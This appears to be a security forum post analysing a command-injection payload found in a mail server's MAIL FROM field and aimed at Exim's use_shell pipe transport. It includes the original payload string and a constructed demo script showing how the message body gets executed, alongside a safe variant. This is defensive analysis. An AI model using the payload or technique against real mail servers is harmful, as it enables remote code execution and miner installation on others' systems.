Found in my mail server logs:

MAIL FROM:<;for P in f W K 0 r S 5 T A u p 4 X E Q;do read;done;sh;exit 0;>

I guess that's a command line injection attempt, aiming at mail servers passing sender address to a spam filter application without escaping. It installs crypto miners.

After ruling out Postfix as the potential target here, I found that the Exim configuration has a use_shell setting for the pipe transport. That seems to be the vulnerable configuration here, and there is an older advisory on it (2013). redteam-pentesting.de/en/advis


So my suspicion about misconfigured spam filtering being the target was obviously wrong. It was far more mundane: the proposed configuration for integrating Dovecot with Exim used to be vulnerable. IMHO it being possible to misconfigure in this way is already ridiculous…

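Added example (not part of the thread above, and not Exim's own code): a small shell script that replays the mechanics of the MAIL FROM payload against a stand-in for a pipe transport. In the vulnerable variant the expanded command line, sender address included, is handed to `sh -c` as one string, which is what Exim's `use_shell` does; the leading `;` ends the intended command, the `for` loop swallows the first 15 lines on stdin (presumably the attacker's guess at the number of header lines Exim writes before the body), `sh` then executes the remainder of stdin, i.e. the message body, and `exit 0` makes the delivery look successful. The safe variant passes the sender as a single argument the way a shell-free exec would. The message, the sender string handling and the marker body are constructed for this demonstration; the real body carried the miner installer the post mentions.

```sh
#!/bin/sh
# Constructed demo of the MAIL FROM command injection seen in the logs.
# The payload is copied from the log line; everything else is made up here.
PAYLOAD=';for P in f W K 0 r S 5 T A u p 4 X E Q;do read;done;sh;exit 0;'

# Constructed message: 15 header lines, then a body the injected `sh` will run.
make_message() {
  i=1
  while [ "$i" -le 15 ]; do
    echo "X-Header-$i: value"
    i=$((i + 1))
  done
  echo 'echo INJECTED-COMMAND-RAN'   # stands in for the miner installer
}

# Vulnerable stand-in for a pipe transport with use_shell set and the sender
# expanded unquoted into the command string: the whole string goes to
# /bin/sh -c, so the `;` in the address terminates `echo` and the rest of the
# address runs as shell code with the message on stdin.
vulnerable_delivery() {
  sender=$1
  make_message | sh -c "echo filter got: $sender" 2>/dev/null
}

# Safe stand-in: the sender is passed as one positional argument, never
# parsed as shell, so the address is just data and the body is never executed.
safe_delivery() {
  sender=$1
  make_message | sh -c 'echo filter got: "$1"; cat >/dev/null' sh "$sender"
}

echo '--- use_shell-style: sender interpolated into the command string'
vulnerable_delivery "$PAYLOAD"
echo '--- sender passed as a single argument'
safe_delivery "$PAYLOAD"
```

The `read` with no variable name is itself a hint about the attacker's assumptions: it works in bash, while dash reports an argument error and reads nothing, in which case the inner `sh` simply starts at the first header line, fails on each one, and still reaches the body. Either way the body executes, which is why the loop count did not need to be exact.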
Infosec Exchange

A Mastodon instance for info/cyber security-minded people.